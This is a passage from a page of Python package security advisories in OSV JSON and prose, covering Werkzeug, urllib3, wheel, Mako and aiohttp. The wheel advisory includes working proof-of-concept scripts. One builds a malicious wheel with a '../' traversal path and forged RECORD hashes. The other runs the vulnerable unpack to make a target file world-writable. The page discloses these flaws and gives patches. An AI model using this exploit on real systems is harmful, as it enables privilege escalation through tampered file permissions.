"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "pyasn1 has a DoS vulnerability in decoder"
}
GHSA-87HC-H4R5-73F7
Vulnerability from github – Published: 2026-01-08 19:51 – Updated: 2026-02-02 19:57Werkzeug's safe_join function allows path segments with Windows device names that have file extensions or trailing spaces. On Windows, there are special device names such as CON, AUX, etc that are implicitly present and readable in every directory. Windows still accepts them with any file extension, such as CON.txt, or trailing spaces such as CON.
This was previously reported as https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2, but the fix failed to account for compound extensions such as CON.txt.html or trailing spaces. It also missed some additional special names.
send_from_directory uses safe_join to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Werkzeug"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-21860"
],
"database_specific": {
"cwe_ids": [
"CWE-67"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-08T19:51:21Z",
"nvd_published_at": "2026-01-08T19:15:59Z",
"severity": "MODERATE"
},
"details": "Werkzeug\u0027s `safe_join` function allows path segments with Windows device names that have file extensions or trailing spaces. On Windows, there are special device names such as `CON`, `AUX`, etc that are implicitly present and readable in every directory. Windows still accepts them with any file extension, such as `CON.txt`, or trailing spaces such as `CON `.\n\nThis was previously reported as https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2, but the fix failed to account for compound extensions such as `CON.txt.html` or trailing spaces. It also missed some additional special names.\n\n`send_from_directory` uses `safe_join` to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely.",
"id": "GHSA-87hc-h4r5-73f7",
"modified": "2026-02-02T19:57:31Z",
"published": "2026-01-08T19:51:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-87hc-h4r5-73f7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21860"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/7ae1d254e04a0c33e241ac1cca4783ce6c875ca3"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/werkzeug"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": " Werkzeug safe_join() allows Windows special device names with compound extensions"
}
GHSA-2XPW-W6GG-JR37
Vulnerability from github – Published: 2025-12-05 18:15 – Updated: 2025-12-05 18:33Impact
urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.
When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation.
The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data.
Affected usages
Applications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources.
stream(), read(amt=256), read1(amt=256), read_chunked(amt=256), readinto(b) are examples of urllib3.HTTPResponse method calls using the affected logic unless decoding is disabled explicitly.
Remediation
Upgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount.
If your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the urllib3[brotli] extra in the patched versions of urllib3.
Credits
The issue was reported by @Cycloctane. Supplemental information was provided by @stamparm during a security audit performed by 7ASecurity and facilitated by OSTIF.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "urllib3"
},
"ranges": [
{
"events": [
{
"introduced": "1.0"
},
{
"fixed": "2.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66471"
],
"database_specific": {
"cwe_ids": [
"CWE-409"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-05T18:15:54Z",
"nvd_published_at": "2025-12-05T17:16:04Z",
"severity": "HIGH"
},
"details": "### Impact\n\nurllib3\u0027s [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nWhen streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation.\n\nThe decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources.\n\n`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`, `readinto(b)` are examples of `urllib3.HTTPResponse` method calls using the affected logic unless decoding is disabled explicitly.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount.\n\nIf your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the `urllib3[brotli]` extra in the patched versions of urllib3.\n\n\n### Credits\n\nThe issue was reported by @Cycloctane.\nSupplemental information was provided by @stamparm during a security audit performed by [7ASecurity](https://7asecurity.com/) and facilitated by [OSTIF](https://ostif.org/).",
"id": "GHSA-2xpw-w6gg-jr37",
"modified": "2025-12-05T18:33:07Z",
"published": "2025-12-05T18:15:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66471"
},
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7"
},
{
"type": "PACKAGE",
"url": "https://github.com/urllib3/urllib3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H",
"type": "CVSS_V4"
}
],
"summary": "urllib3 streaming API improperly handles highly compressed data"
}
GHSA-8RRH-RW8J-W5FX
Vulnerability from github – Published: 2026-01-22 18:02 – Updated: 2026-01-23 17:44Summary
- Vulnerability Type: Path Traversal (CWE-22) leading to Arbitrary File Permission Modification.
- Root Cause Component: wheel.cli.unpack.unpack function.
- Affected Packages:
- wheel (Upstream source)
- setuptools (Downstream, vendors wheel)
- Severity: High (Allows modifying system file permissions).
Details
The vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path.
# Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel)
for zinfo in wf.filelist:
wf.extract(zinfo, destination) # (1) Extraction is handled safely by zipfile
# (2) VULNERABILITY:
# The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'.
# If zinfo.filename contains "../", this targets files outside the destination.
permissions = zinfo.external_attr >> 16 & 0o777
destination.joinpath(zinfo.filename).chmod(permissions)
PoC
I have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack.
Prerequisites: pip install setuptools
Step 1: Generate the Malicious Wheel (gen_poc.py)
This script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list.
import zipfile
import hashlib
import base64
import os
def urlsafe_b64encode(data):
"""
Helper function to encode data using URL-safe Base64 without padding.
Required by the Wheel file format specification.
"""
return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')
def get_hash_and_size(data_bytes):
"""
Calculates SHA-256 hash and size of the data.
These values are required to construct a valid 'RECORD' file,
which is used by the 'wheel' library to verify integrity.
"""
digest = hashlib.sha256(data_bytes).digest()
hash_str = "sha256=" + urlsafe_b64encode(digest)
return hash_str, str(len(data_bytes))
def create_evil_wheel_v4(filename="evil-1.0-py3-none-any.whl"):
print(f"[Generator V4] Creating 'Authenticated' Malicious Wheel: {filename}")
# 1. Prepare Standard Metadata Content
# These are minimal required contents to make the wheel look legitimate.
wheel_content = b"Wheel-Version: 1.0\nGenerator: bdist_wheel (0.37.1)\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
metadata_content = b"Metadata-Version: 2.1\nName: evil\nVersion: 1.0\nSummary: PoC Package\n"
# 2. Define Malicious Payload (Path Traversal)
# The content doesn't matter, but the path does.
payload_content = b"PWNED by Path Traversal"
# [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using '../'
# The vulnerability allows 'chmod' to affect this path directly.
malicious_path = "../../poc_target.txt"
# 3. Calculate Hashes for Integrity Check Bypass
# The 'wheel' library verifies if the file hash matches the RECORD entry.
# To bypass this check, we calculate the correct hash for our malicious file.
wheel_hash, wheel_size = get_hash_and_size(wheel_content)
metadata_hash, metadata_size = get_hash_and_size(metadata_content)
payload_hash, payload_size = get_hash_and_size(payload_content)
# 4. Construct the 'RECORD' File
# The RECORD file lists all files in the wheel with their hashes.
# CRITICAL: We explicitly register the malicious path ('../../poc_target.txt') here.
# This tricks the 'wheel' library into treating the malicious file as a valid, verified component.
record_lines = [
f"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}",
f"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}",
f"{malicious_path},{payload_hash},{payload_size}", # <-- Authenticating the malicious path
"evil-1.0.dist-info/RECORD,,"
]
record_content = "\n".join(record_lines).encode('utf-8')
# 5. Build the Zip File
with zipfile.ZipFile(filename, "w") as zf:
# Write standard metadata files
zf.writestr("evil-1.0.dist-info/WHEEL", wheel_content)
zf.writestr("evil-1.0.dist-info/METADATA", metadata_content)
zf.writestr("evil-1.0.dist-info/RECORD", record_content)
# [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file
# We need to set specific permission bits to trigger the vulnerability.
zinfo = zipfile.ZipInfo(malicious_path)
# Set external attributes to 0o777 (rwxrwxrwx)
# Upper 16 bits: File type (0o100000 = Regular File)
# Lower 16 bits: Permissions (0o777 = World Writable)
# The vulnerable 'unpack' function will blindly apply this '777' to the system file.
zinfo.external_attr = (0o100000 | 0o777) << 16
zf.writestr(zinfo, payload_content)
print("[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.")
if __name__ == "__main__":
create_evil_wheel_v4()
Step 2: Run the Exploit (exploit.py)
from pathlib import Path
import sys
# Demonstrating impact on setuptools
try:
from setuptools._vendor.wheel.cli.unpack import unpack
print("[*] Loaded unpack from setuptools")
except ImportError:
from wheel.cli.unpack import unpack
print("[*] Loaded unpack from wheel")
# 1. Setup Target (Read-Only system file simulation)
target = Path("poc_target.txt")
target.write_text("SENSITIVE CONFIG")
target.chmod(0o400) # Read-only
print(f"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}")
# 2. Run Vulnerable Unpack
# The wheel contains "../../poc_target.txt".
# unpack() will extract safely, BUT chmod() will hit the actual target file.
try:
unpack("evil-1.0-py3-none-any.whl", "unpack_dest")
except Exception as e:
print(f"[!] Ignored expected extraction error: {e}")
# 3. Check Result
final_perms = oct(target.stat().st_mode)[-3:]
print(f"[*] Final Perms: {final_perms}")
if final_perms == "777":
print("VULNERABILITY CONFIRMED: Target file is now world-writable (777)!")
else:
print("[-] Attack failed.")
result:
Impact
Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.
Recommended Fix
The unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract().
Suggested Patch:
# extract() returns the actual path where the file was written
extracted_path = wf.extract(zinfo, destination)
# Only apply chmod if a file was actually written
if extracted_path:
permissions = zinfo.external_attr >> 16 & 0o777
Path(extracted_path).chmod(permissions)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.46.1"
},
"package": {
"ecosystem": "PyPI",
"name": "wheel"
},
"ranges": [
{
"events": [
{
"introduced": "0.40.0"
},
{
"fixed": "0.46.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-24049"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-22T18:02:56Z",
"nvd_published_at": "2026-01-22T05:16:23Z",
"severity": "HIGH"
},
"details": "### Summary\n - **Vulnerability Type:** Path Traversal (CWE-22) leading to Arbitrary File Permission Modification. \n - **Root Cause Component:** wheel.cli.unpack.unpack function. \n - **Affected Packages:** \n 1. wheel (Upstream source) \n 2. setuptools (Downstream, vendors wheel) \n - **Severity:** High (Allows modifying system file permissions). \n\n### Details \nThe vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. \n```\n# Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel)\nfor zinfo in wf.filelist:\n wf.extract(zinfo, destination) # (1) Extraction is handled safely by zipfile\n\n # (2) VULNERABILITY:\n # The \u0027permissions\u0027 are applied to a path constructed using the UNSANITIZED \u0027zinfo.filename\u0027.\n # If zinfo.filename contains \"../\", this targets files outside the destination.\n permissions = zinfo.external_attr \u003e\u003e 16 \u0026 0o777\n destination.joinpath(zinfo.filename).chmod(permissions)\n``` \n\n### PoC \nI have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack. \n\n**Prerequisites:** pip install setuptools \n\n**Step 1: Generate the Malicious Wheel (gen_poc.py)** \nThis script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list. \n```\nimport zipfile\nimport hashlib\nimport base64\nimport os\n\ndef urlsafe_b64encode(data):\n \"\"\"\n Helper function to encode data using URL-safe Base64 without padding.\n Required by the Wheel file format specification.\n \"\"\"\n return base64.urlsafe_b64encode(data).rstrip(b\u0027=\u0027).decode(\u0027ascii\u0027)\n\ndef get_hash_and_size(data_bytes):\n \"\"\"\n Calculates SHA-256 hash and size of the data.\n These values are required to construct a valid \u0027RECORD\u0027 file,\n which is used by the \u0027wheel\u0027 library to verify integrity.\n \"\"\"\n digest = hashlib.sha256(data_bytes).digest()\n hash_str = \"sha256=\" + urlsafe_b64encode(digest)\n return hash_str, str(len(data_bytes))\n\ndef create_evil_wheel_v4(filename=\"evil-1.0-py3-none-any.whl\"):\n print(f\"[Generator V4] Creating \u0027Authenticated\u0027 Malicious Wheel: {filename}\")\n\n # 1. Prepare Standard Metadata Content\n # These are minimal required contents to make the wheel look legitimate.\n wheel_content = b\"Wheel-Version: 1.0\\nGenerator: bdist_wheel (0.37.1)\\nRoot-Is-Purelib: true\\nTag: py3-none-any\\n\"\n metadata_content = b\"Metadata-Version: 2.1\\nName: evil\\nVersion: 1.0\\nSummary: PoC Package\\n\"\n \n # 2. Define Malicious Payload (Path Traversal)\n # The content doesn\u0027t matter, but the path does.\n payload_content = b\"PWNED by Path Traversal\"\n\n # [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using \u0027../\u0027\n # The vulnerability allows \u0027chmod\u0027 to affect this path directly.\n malicious_path = \"../../poc_target.txt\"\n\n # 3. Calculate Hashes for Integrity Check Bypass\n # The \u0027wheel\u0027 library verifies if the file hash matches the RECORD entry.\n # To bypass this check, we calculate the correct hash for our malicious file.\n wheel_hash, wheel_size = get_hash_and_size(wheel_content)\n metadata_hash, metadata_size = get_hash_and_size(metadata_content)\n payload_hash, payload_size = get_hash_and_size(payload_content)\n\n # 4. Construct the \u0027RECORD\u0027 File\n # The RECORD file lists all files in the wheel with their hashes.\n # CRITICAL: We explicitly register the malicious path (\u0027../../poc_target.txt\u0027) here.\n # This tricks the \u0027wheel\u0027 library into treating the malicious file as a valid, verified component.\n record_lines = [\n f\"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}\",\n f\"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}\",\n f\"{malicious_path},{payload_hash},{payload_size}\", # \u003c-- Authenticating the malicious path\n \"evil-1.0.dist-info/RECORD,,\"\n ]\n record_content = \"\\n\".join(record_lines).encode(\u0027utf-8\u0027)\n\n # 5. Build the Zip File\n with zipfile.ZipFile(filename, \"w\") as zf:\n # Write standard metadata files\n zf.writestr(\"evil-1.0.dist-info/WHEEL\", wheel_content)\n zf.writestr(\"evil-1.0.dist-info/METADATA\", metadata_content)\n zf.writestr(\"evil-1.0.dist-info/RECORD\", record_content)\n\n # [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file\n # We need to set specific permission bits to trigger the vulnerability.\n zinfo = zipfile.ZipInfo(malicious_path)\n \n # Set external attributes to 0o777 (rwxrwxrwx)\n # Upper 16 bits: File type (0o100000 = Regular File)\n # Lower 16 bits: Permissions (0o777 = World Writable)\n # The vulnerable \u0027unpack\u0027 function will blindly apply this \u0027777\u0027 to the system file.\n zinfo.external_attr = (0o100000 | 0o777) \u003c\u003c 16\n \n zf.writestr(zinfo, payload_content)\n\n print(\"[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.\")\n\nif __name__ == \"__main__\":\n create_evil_wheel_v4()\n``` \n\n**Step 2: Run the Exploit (exploit.py)** \n```\nfrom pathlib import Path\nimport sys\n\n# Demonstrating impact on setuptools\ntry:\n from setuptools._vendor.wheel.cli.unpack import unpack\n print(\"[*] Loaded unpack from setuptools\")\nexcept ImportError:\n from wheel.cli.unpack import unpack\n print(\"[*] Loaded unpack from wheel\")\n\n# 1. Setup Target (Read-Only system file simulation)\ntarget = Path(\"poc_target.txt\")\ntarget.write_text(\"SENSITIVE CONFIG\")\ntarget.chmod(0o400) # Read-only\nprint(f\"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}\")\n\n# 2. Run Vulnerable Unpack\n# The wheel contains \"../../poc_target.txt\".\n# unpack() will extract safely, BUT chmod() will hit the actual target file.\ntry:\n unpack(\"evil-1.0-py3-none-any.whl\", \"unpack_dest\")\nexcept Exception as e:\n print(f\"[!] Ignored expected extraction error: {e}\")\n\n# 3. Check Result\nfinal_perms = oct(target.stat().st_mode)[-3:]\nprint(f\"[*] Final Perms: {final_perms}\")\n\nif final_perms == \"777\":\n print(\"VULNERABILITY CONFIRMED: Target file is now world-writable (777)!\")\nelse:\n print(\"[-] Attack failed.\")\n``` \n\n**result:** \n\u003cimg width=\"806\" height=\"838\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f750eb3b-36ea-445c-b7f4-15c14eb188db\" /\u003e \n \n### Impact \nAttackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. \n\n### Recommended Fix \nThe unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract(). \n\n### Suggested Patch: \n```\n# extract() returns the actual path where the file was written\nextracted_path = wf.extract(zinfo, destination)\n\n# Only apply chmod if a file was actually written\nif extracted_path:\n permissions = zinfo.external_attr \u003e\u003e 16 \u0026 0o777\n Path(extracted_path).chmod(permissions)\n```",
"id": "GHSA-8rrh-rw8j-w5fx",
"modified": "2026-01-23T17:44:38Z",
"published": "2026-01-22T18:02:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049"
},
{
"type": "WEB",
"url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef"
},
{
"type": "WEB",
"url": "https://github.com/pypa/wheel/commit/934fe177ff912c8e03d5ae951d3805e1fd90ba5e"
},
{
"type": "PACKAGE",
"url": "https://github.com/pypa/wheel"
},
{
"type": "WEB",
"url": "https://github.com/pypa/wheel/releases/tag/0.46.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Wheel Affected by Arbitrary File Permission Modification via Path Traversal in wheel unpack"
}
GHSA-2H4P-VJRC-8XPQ
Vulnerability from github – Published: 2026-05-06 21:45 – Updated: 2026-05-13 16:43Summary
On Windows, a URI using backslash traversal (e.g. \..\..\ secret.txt) bypasses the directory traversal check in Template.__init__ and the posixpath-based normalization in TemplateLookup.get_template(), allowing reads of files outside the configured template directory.
Details
The root cause is a mismatch between posixpath (used for URI normalization in get_template()) and os.path (used for file access via os.path.isfile() and validation via os.path.normpath() in Template.__init__). On Windows, os.path is ntpath, which treats \ as a path separator, while posixpath treats it as a literal character.
The vulnerability chain:
get_template()strips only leading/viare.sub(r"^\/+", "", uri)and normalizes withposixpath— backslash\is treated as a literal character, so\..\ secret.txtpasses through with..undetected.Template.__init__()validation usesos.path.normpath()— on Windows this resolves\..\ secret.txtto\secret.txt, which does not start with.., so thestartswith("..")check passes.os.path.isfile()on Windows interprets\as a path separator, resolving the..traversal and finding files outside the template directory.
Affected code
mako/lookup.py:TemplateLookup.get_template()usesposixpath.normpath/posixpath.joinfor path construction butos.path.isfile()for existence checkmako/template.py:Template.__init__()URI validation usesos.path.normpath()which on Windows resolves backslash traversal to a form that passes thestartswith("..")guard
Impact
If an application passes user-controlled template names or include paths to TemplateLookup.get_template(), an attacker on Windows may be able to load and disclose readable files outside the configured template directory. The primary impact is local file disclosure. If the targeted file contains Mako/Python template syntax, it may also be parsed and executed as a template.
Remediation
The fix should normalize backslashes to forward slashes early in the URI processing pipeline, before any path operations, to ensure consistent behavior across platforms.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.3.11"
},
"package": {
"ecosystem": "PyPI",
"name": "Mako"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.12"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44307"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T21:45:16Z",
"nvd_published_at": "2026-05-12T22:16:37Z",
"severity": "HIGH"
},
"details": "## Summary\n\nOn Windows, a URI using backslash traversal (e.g. `\\..\\..\\ secret.txt`) bypasses the directory traversal check in `Template.__init__` and the `posixpath`-based normalization in `TemplateLookup.get_template()`, allowing reads of files outside the configured template directory.\n\n\n## Details\n\nThe root cause is a mismatch between `posixpath` (used for URI normalization in `get_template()`) and `os.path` (used for file access via `os.path.isfile()` and validation via `os.path.normpath()` in `Template.__init__`). On Windows, `os.path` is `ntpath`, which treats `\\` as a path separator, while `posixpath` treats it as a literal character.\n\nThe vulnerability chain:\n\n1. `get_template()` strips only leading `/` via `re.sub(r\"^\\/+\", \"\", uri)` and normalizes with `posixpath` \u2014 backslash `\\` is treated as a literal character, so `\\..\\ secret.txt` passes through with `..` undetected.\n2. `Template.__init__()` validation uses `os.path.normpath()` \u2014 on Windows this resolves `\\..\\ secret.txt` to `\\secret.txt`, which does not start with `..`, so the `startswith(\"..\")` check passes.\n3. `os.path.isfile()` on Windows interprets `\\` as a path separator, resolving the `..` traversal and finding files outside the template directory.\n\n### Affected code\n\n- `mako/lookup.py`: `TemplateLookup.get_template()` uses `posixpath.normpath`/`posixpath.join` for path construction but `os.path.isfile()` for existence check\n- `mako/template.py`: `Template.__init__()` URI validation uses `os.path.normpath()` which on Windows resolves backslash traversal to a form that passes the `startswith(\"..\")` guard\n\n## Impact\n\nIf an application passes user-controlled template names or include paths to `TemplateLookup.get_template()`, an attacker on Windows may be able to load and disclose readable files outside the configured template directory. The primary impact is local file disclosure. If the targeted file contains Mako/Python template syntax, it may also be parsed and executed as a template.\n\n## Remediation\n\nThe fix should normalize backslashes to forward slashes early in the URI processing pipeline, before any path operations, to ensure consistent behavior across platforms.",
"id": "GHSA-2h4p-vjrc-8xpq",
"modified": "2026-05-13T16:43:11Z",
"published": "2026-05-06T21:45:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sqlalchemy/mako/security/advisories/GHSA-2h4p-vjrc-8xpq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44307"
},
{
"type": "WEB",
"url": "https://github.com/sqlalchemy/mako/issues/435"
},
{
"type": "WEB",
"url": "https://github.com/sqlalchemy/mako/commit/72e10c573ca0fbcbddd4455abca8ce92a61780d7"
},
{
"type": "PACKAGE",
"url": "https://github.com/sqlalchemy/mako"
},
{
"type": "WEB",
"url": "https://github.com/sqlalchemy/mako/releases/tag/rel_1_3_12"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Mako vulnerable to path traversal via backslash URI on Windows in TemplateLookup"
}
GHSA-QCCP-GFCP-XXVC
Vulnerability from github – Published: 2026-05-11 14:51 – Updated: 2026-05-14 20:35Impact
When following cross-origin redirects for requests made using urllib3’s high-level APIs, such as urllib3.request(), PoolManager.request(), and ProxyManager.request(), sensitive headers — Authorization, Cookie, and Proxy-Authorization (defined in Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT) — are stripped by default, as expected.
However, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers.
Affected usage
Applications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through HTTPConnection.urlopen() instances created via ProxyManager.connection_from_url().
Remediation
Upgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by HTTPConnection.
If upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to ProxyManager.request().
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "urllib3"
},
"ranges": [
{
"events": [
{
"introduced": "1.23"
},
{
"fixed": "2.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44431"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-11T14:51:20Z",
"nvd_published_at": "2026-05-13T16:16:57Z",
"severity": "HIGH"
},
"details": "### Impact\n\nWhen following cross-origin redirects for requests made using urllib3\u2019s high-level APIs, such as `urllib3.request()`, `PoolManager.request()`, and `ProxyManager.request()`, sensitive headers \u2014 `Authorization`, `Cookie`, and `Proxy-Authorization` (defined in `Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT`) \u2014 are stripped by default, as expected.\n\nHowever, cross-origin redirects followed from the low-level API via `ProxyManager.connection_from_url().urlopen(..., assert_same_host=False)` still forward these sensitive headers.\n\n### Affected usage\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through `HTTPConnection.urlopen()` instances created via `ProxyManager.connection_from_url()`.\n\n### Remediation\n\nUpgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by `HTTPConnection`.\n\nIf upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to `ProxyManager.request()`.",
"id": "GHSA-qccp-gfcp-xxvc",
"modified": "2026-05-14T20:35:49Z",
"published": "2026-05-11T14:51:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
},
{
"type": "PACKAGE",
"url": "https://github.com/urllib3/urllib3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "urllib3: Sensitive headers forwarded across origins in proxied low-level redirects"
}
GHSA-HCC4-C3V8-RX92
Vulnerability from github – Published: 2026-04-01 21:19 – Updated: 2026-04-06 16:46Summary
An unbounded DNS cache could result in excessive memory usage possibly resulting in a DoS situation.
Impact
If an application makes requests to a very large number of hosts, this could cause the DNS cache to continue growing and slowly use excessive amounts of memory.
Patch: https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34513"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
